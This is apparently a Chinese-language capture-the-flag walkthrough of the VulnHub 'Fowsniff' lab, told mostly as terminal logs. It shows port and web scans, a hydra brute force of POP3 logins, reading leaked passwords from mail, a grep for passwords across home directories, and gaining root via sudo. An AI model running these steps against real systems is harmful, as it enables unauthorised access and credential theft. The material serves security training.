┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace] └─$ sudo nmap -sn 192.168.56.0/24 [sudo] password for kali: Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-25 23:09 CST Nmap scan report for 192.168.56.1 Host is up (0.00030s latency). MAC Address: 0A:00:27:00:00:08 (Unknown) Nmap scan report for 192.168.56.100 Host is up (0.00014s latency). MAC Address: 08:00:27:2E:A1:5A (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.107 Host is up (0.00032s latency). MAC Address: 08:00:27:B0:22:14 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.144 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 9.88 seconds
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace] └─$ sudo nmap -p- --min-rate=10000 192.168.56.107 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-25 23:09 CST Stats: 0:01:53 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 90.33% done; ETC: 23:11 (0:00:11 remaining) Stats: 0:03:21 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 99.99% done; ETC: 23:12 (0:00:00 remaining) Warning: 192.168.56.107 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.56.107 Host is up (0.0060s latency). Not shown: 37408 filtered tcp ports (no-response), 28123 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 110/tcp open pop3 143/tcp open imap MAC Address: 08:00:27:B0:22:14 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 248.28 seconds
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace] └─$ sudo nmap -sT -sV -sC -O -p22,80,110,143 192.168.56.107 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-25 23:14 CST Nmap scan report for 192.168.56.107 Host is up (0.00050s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 903566f4c6d295121be8cddeaa4e0323 (RSA) | 256 539d236734cf0ad55a9a1174bdfdde71 (ECDSA) |_ 256 a28fdbae9e3dc9e6a9ca03b1d71b6683 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-title: Fowsniff Corp - Delivering Solutions |_http-server-header: Apache/2.4.18 (Ubuntu) 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: SASL(PLAIN) TOP CAPA USER UIDL RESP-CODES AUTH-RESP-CODE PIPELINING 143/tcp open imap Dovecot imapd |_imap-capabilities: LOGIN-REFERRALS capabilities have ENABLE Pre-login IDLE listed AUTH=PLAINA0001 more post-login OK SASL-IR LITERAL+ IMAP4rev1 ID MAC Address: 08:00:27:B0:22:14 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace] └─$ sudo nmap --script=vuln 192.168.56.107 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-25 23:18 CST Nmap scan report for 192.168.56.107 Host is up (0.00032s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 | http-internal-ip-disclosure: |_ Internal IP Leaked: 127.0.1.1 | http-enum: | /robots.txt: Robots file | /README.txt: Interesting, a readme. |_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' |_http-dombased-xss: Couldn't find any DOM based XSS. 110/tcp open pop3 143/tcp open imap MAC Address: 08:00:27:B0:22:14 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 334.22 seconds
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace] └─$ sudo nikto -h http://192.168.56.107 [sudo] password for kali: - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 192.168.56.107 + Target Hostname: 192.168.56.107 + Target Port: 80 + Start Time: 2023-05-25 23:37:26 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. + /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed + /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649 + /: Server may leak inodes via ETags, header found with file /, inode: a45, size: 5674fd157f6d0, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418 + OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS . + /images/: Directory indexing found. + /LICENSE.txt: License file found may identify site software. + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/ + 8102 requests: 0 error(s) and 10 item(s) reported on remote host + End Time: 2023-05-25 23:37:50 (GMT8) (24 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
---- Entering directory: http://192.168.56.107/assets/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://192.168.56.107/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace] └─$ telnet 192.168.56.107 110 Trying 192.168.56.107... Connected to 192.168.56.107. Escape character is '^]'. +OK Welcome to the Fowsniff Corporate Mail Server! user mauer +OK pass carp4ever -ERR [AUTH] Authentication failed. us-ERR Disconnected for inactivity. Connection closed by foreign host.
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace] └─$ hydra -L username -P password -s 110 192.168.56.107 pop3 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-26 00:46:04 [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal! [DATA] max 16 tasks per 1 server, overall 16 tasks, 80 login tries (l:10/p:8), ~5 tries per task [DATA] attacking pop3://192.168.56.107:110/ [110][pop3] host: 192.168.56.107 login: seina password: scoobydoo2 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-26 00:46
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace] └─$ sudo telnet 192.168.56.107 110 Trying 192.168.56.107... Connected to 192.168.56.107. Escape character is '^]'. +OK Welcome to the Fowsniff Corporate Mail Server! user seina +OK pass scoobydoo2 +OK Logged in. stat +OK 2 2902 list +OK 2 messages: 1 1622 2 1280 .
retr 1 +OK 1622 octets Return-Path: <stone@fowsniff> X-Original-To: seina@fowsniff Delivered-To: seina@fowsniff Received: by fowsniff (Postfix, from userid 1000) id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT) To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff, mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff, tegel@fowsniff Subject: URGENT! Security EVENT! Message-Id: <20180313185107.0FA3916A@fowsniff> Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT) From: stone@fowsniff (stone)
Dear All,
A few days ago, a malicious actor was able to gain entry to our internal email systems. The attacker was able to exploit incorrectly filtered escape characters within our SQL database to access our login credentials. Both the SQL and authentication system used legacy methods that had not been updated in some time.
We have been instructed to perform a complete internal system overhaul. While the main systems are "in the shop," we have moved to this isolated, temporary server that has minimal functionality.
This server is capable of sending and receiving emails, but only locally. That means you can only send emails to other users, not to the world wide web. You can, however, access this system via the SSH protocol.
The temporary password for SSH is "S1ck3nBluff+secureshell"
You MUST change this password as soon as possible, and you will do so under my guidance. I saw the leak the attacker posted online, and I must say that your passwords were not very secure.
Come see me in my office at your earliest convenience and we'll set it up.
retr 2 +OK 1280 octets Return-Path: <baksteen@fowsniff> X-Original-To: seina@fowsniff Delivered-To: seina@fowsniff Received: by fowsniff (Postfix, from userid 1004) id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT) To: seina@fowsniff Subject: You missed out! Message-Id: <20180313185405.101CA1AC2@fowsniff> Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT) From: baksteen@fowsniff
Devin,
You should have seen the brass lay into AJ today! We are going to be talking about this one for a looooong time hahaha. Who knew the regional manager had been in the navy? She was swearing like a sailor!
I don't know what kind of pneumonia or something you brought back with you from your camping trip, but I think I'm coming down with it myself. How long have you been gone - a week? Next time you're going to get sick and miss the managerial blowout of the century, at least keep it to yourself!
I'm going to head home early and eat some chicken soup. I think I just got an email from Stone, too, but it's probably just some "Let me explain the tone of my meeting with management" face-saving mail. I'll read it when I get back.
Feel better,
Skyler
PS: Make sure you change your email password. AJ had been telling us to do that right before Captain Profanity showed up.
**** Welcome to the Fowsniff Corporate Server! ****
---------- NOTICE: ----------
* Due to the recent security breach, we are running on a very minimal system. * Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.
Last login: Tue Mar 13 16:55:40 2018 from 192.168.7.36 baksteen@fowsniff:~$ whoami baksteen baksteen@fowsniff:~$ pwd /home/baksteen baksteen@fowsniff:~$ uname -a Linux fowsniff 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
baksteen@fowsniff:/opt/cube$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.
# m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) #
没啥自动任务。
老三样整完了,手动看看各个目录里的文件看看吧。
你可以错过冬日的暖阳,也可以错过夏日的微风,但你一定不能错过多用户环境检索用户遗留的凭证。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
baksteen@fowsniff:/home$ ll total 44 drwxr-xr-x 11 root root 4096 Mar 8 2018 ./ drwxr-xr-x 22 root root 4096 Mar 9 2018 ../ drwxrwx--- 4 baksteen baksteen 4096 Mar 13 2018 baksteen/ drwxrwx--- 3 mauer mauer 4096 Mar 11 2018 mauer/ drwxrwx--- 3 mursten mursten 4096 Mar 11 2018 mursten/ drwxrwx--- 3 mustikka mustikka 4096 Mar 11 2018 mustikka/ drwxrwx--- 3 parede parede 4096 Mar 11 2018 parede/ drwxrwx--- 3 sciana sciana 4096 Mar 11 2018 sciana/ drwxrwx--- 4 seina seina 4096 Mar 11 2018 seina/ drwxrwx--- 4 stone stone 4096 Mar 13 2018 stone/ drwxrwx--- 3 tegel tegel 4096 Mar 11 2018 tegel/ baksteen@fowsniff:/home$ grep -R -i pass /home/* 2>/dev/null /home/baksteen/Maildir/new/1520967067.V801I23764M196461.fowsniff:The temporary password for SSH is "S1ck3nBluff+secureshell" /home/baksteen/Maildir/new/1520967067.V801I23764M196461.fowsniff:You MUST change this password as soon as possible, and you will do so under my /home/baksteen/Maildir/new/1520967067.V801I23764M196461.fowsniff:passwords were not very secure.
然而系统管理员把权限配置的很好,根本就进不去其他用户的目录。
行,看不了别人的还看不了自己的吗,看看baksteen老哥还给我们留下来什么宝贝。
1 2 3 4 5 6 7 8 9 10 11 12 13
baksteen@fowsniff:~$ ll total 40 drwxrwx--- 4 baksteen baksteen 4096 Mar 13 2018 ./ drwxr-xr-x 11 root root 4096 Mar 8 2018 ../ -rw------- 1 baksteen users 1 Mar 13 2018 .bash_history -rw-r--r-- 1 baksteen users 220 Aug 31 2015 .bash_logout -rw-r--r-- 1 baksteen users 3771 Aug 31 2015 .bashrc drwx------ 2 baksteen users 4096 Mar 8 2018 .cache/ -rw-r--r-- 1 baksteen users 0 Mar 9 2018 .lesshsQ drwx------ 5 baksteen users 4096 Mar 9 2018 Maildir/ -rw-r--r-- 1 baksteen users 655 May 16 2017 .profile -rw-r--r-- 1 baksteen users 97 Mar 9 2018 term.txt -rw------- 1 baksteen users 2981 Mar 13 2018 .viminfo
有txt先看txt。
1 2 3
baksteen@fowsniff:~$ cat term.txt I wonder if the person who coined the term "One Hit Wonder" came up with another other phrases.
baksteen@fowsniff:/etc/update-motd.d$ cat 00-header #!/bin/sh # # 00-header - create the header of the MOTD # Copyright (C) 2009-2010 Canonical Ltd. # # Authors: Dustin Kirkland <kirkland@canonical.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#[ -r /etc/lsb-release ] && . /etc/lsb-release
#if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then # # Fall back to using the very slow lsb_release utility # DISTRIB_DESCRIPTION=$(lsb_release -s -d) #fi
**** Welcome to the Fowsniff Corporate Server! ****
---------- NOTICE: ----------
* Due to the recent security breach, we are running on a very minimal system. * Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.
Last login: Thu May 25 13:20:41 2023 from 192.168.56.144 baksteen@fowsniff:~$ sudo -l Matching Defaults entries for baksteen on fowsniff: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User baksteen may run the following commands on fowsniff: (ALL) NOPASSWD: ALL baksteen@fowsniff:~$ sudo su root@fowsniff:/home/baksteen# whoami root root@fowsniff:/home/baksteen# cd ~ root@fowsniff:~# ll total 28 drwx------ 4 root root 4096 Mar 9 2018 ./ drwxr-xr-x 22 root root 4096 Mar 9 2018 ../ -rw-r--r-- 1 root root 3117 Mar 9 2018 .bashrc -rw-r--r-- 1 root root 582 Mar 9 2018 flag.txt drwx------ 5 root root 4096 Mar 9 2018 Maildir/ drwxr-xr-x 2 root root 4096 Mar 9 2018 .nano/ -rw-r--r-- 1 root root 148 Aug 17 2015 .profile root@fowsniff:~# cat flag.txt ___ _ _ _ _ _ / __|___ _ _ __ _ _ _ __ _| |_ _ _| |__ _| |_(_)___ _ _ __| | | (__/ _ \ ' \/ _` | '_/ _` | _| || | / _` | _| / _ \ ' \(_-<_| \___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_) |___/
(_) |-------------- |&&&&&&&&&&&&&&| | R O O T | | F L A G | |&&&&&&&&&&&&&&| |-------------- | | | | | | ---
Nice work!
This CTF was built with love in every byte by @berzerk0 on Twitter.
Special thanks to psf, @nbulischeck and the whole Fofao Team.
在浏览器试一下,发现并没有登录页面。而且提示的错误明显发现肯定是网页用http协议连接出问题了。